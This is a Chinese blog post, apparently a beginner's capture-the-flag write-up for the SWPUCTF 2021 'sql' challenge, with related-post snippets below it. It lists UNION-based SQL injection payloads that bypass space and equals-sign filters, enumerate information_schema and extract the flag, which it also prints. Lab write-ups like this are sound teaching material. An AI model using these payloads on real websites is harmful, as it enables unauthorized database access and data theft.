[SWPUCTF 2021 新生赛]sql

于 2024-06-11 22:05:06 发布
阅读量442 收藏 3
点赞数 5
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44833249/article/details/139609708
版权

第一次做sql注入,所以写的较为详细

希望能帮助各位师傅快速熟练sql注入

打开环境,依旧是sql注入,(自己实在不知道过滤了啥)经过看大佬wp知道这题目过滤了等于号,空格,

空格用/**/绕过,等于号用like绕过,其他的没什么区别

Payload:wllm=1’,报错说明存在sql注入,

判断有几列

Payload:wllm=1%27/**/order/**/by/**/4%23,返还错误,把4改成3运行正常

说明有3列

Payload:?wllm=-1%27/**/union/**/select/**/1,2,3/**/%23判断回显位

?wllm=-1%27/**/union/**/select/**/1,2,database()/**/%23查询数据库名

Payload:?wllm=-1%27/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/%27test_db%27%23 查询数据库中的数据表

Payload?wllm=-1%27/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/%27LTLT_flag%27%23 查询LTLT_flag数据表字段

Payload?wllm=-1%27/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23  查询LTLT_flag数据表中flag字段

这里被截断了,一次只能输出20个,这就需要用到mid函数

mid(group_concat(flag),20,20)表示输出flag字段中第二十个字符开始的后二十个字符,所以就可以得出完整的flag

要注意第一张图片和第二张图片的9是重复的,拼接的时候需要删除一个9

即flag:NSSCTF{79696988-b3b9-44f9-b053-03bcdbd173b3}

flag{Funny_web}
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]sql - 联合注入
oZuoShen123的博客
10-07 611
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字被过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
绿城杯 CTF 2021 真题 (1).rar
12-07
【绿城杯 CTF 2021 真题】是一个网络安全竞的实战题目集,主要涉及计算机安全领域的各种挑战,旨在检验参者在逆向工程、密码学、Web安全、移动安全、取证分析等多个方面的技能。CTF(Capture The Flag)比是一...
2021工作日sql
01-07
2021工作日sql
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
Oracle sql 2021年节假 语句
12-11
Oracle sql 2021年节假 语句 执行语句 2021年节假日 Oracle sql 2021年节假 语句 执行语句 2021年节假日
2019-2021工作日sql
01-01
只区分工作日和非工作日
NSS [SWPUCTF 2021 新生]sql
Jay17的博客
10-26 762
NSS [SWPUCTF 2021 新生]sql
sql [SWPUCTF 2021 新生]easy_sql
m0_75178803的博客
12-21 463
打开题目,直接查看源代码给了提示注入点是wllm。输入1' 报错,说明注入点是字符型注入。我们知道表名有test_tb和users。同样这道题也可以用sqlmap跑一下看看。然后得到了name和password。我们知道数据库名为test_db。我们选择test_tb进行爆破。看见有id和flag两个字段。爆破数据显示位为2,3。我们直接爆破数据库名。
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1430
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
记一次[SWPUCTF 2021 新生]sql
dangwobucunzai的博客
03-12 337
到这里之后开始union注入,发现 = 也是被检测的,可以使用like来代替 = ,先查一下回显点,接下来就开始使用查询系统库来获取表名,直接使用database() 代替数据库名了,就不查询数据库名了。试一试order by,但是发现检测空格,这里可以使用多行注释 /**/ 来代替空格,使用order by 进行探测,到4的时候报错。试了下,发现mid是可以的,但是似乎是限制只能输出这么长,所以还要修改一下mid,做题太久了,一不注意靶场就自动关闭了。找到了flag所在字段,接下来就是查这个字段了。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
最新发布
2301_79326813的博客
02-10 943
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
[SWPUCTF 2018]SimplePHP
07-28
回答: \[1\]中的代码片段是一个PHP代码示例,其中定义了三个类C1e4r、Show和Test,并创建了相应的对象。\[2\]中的代码片段是一个PHP文件,它包含了一些文件操作和类的实例化。\[3\]中的代码片段是一个POC(Proof of Concept)示例,用于演示一个可能的漏洞利用场景。根据提供的信息,这个问题可能是关于SWPUCTF 2018比中的一个题目,题目名称为"SimplePHP"。然而,由于提供的引用内容不完整,无法给出更具体的答案。如果您有关于这个问题的更多信息,请提供更多的上下文,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* [[SWPUCTF 2018]SimplePHP_wp](https://blog.csdn.net/lzu_lfl/article/details/127802053)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[SWPUCTF 2018]SimplePHP](https://blog.csdn.net/shinygod/article/details/124002143)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[SWPUCTF 2018]SimplePHP--一道简单的Phar反序列化题目](https://blog.csdn.net/qq_41401434/article/details/125323752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值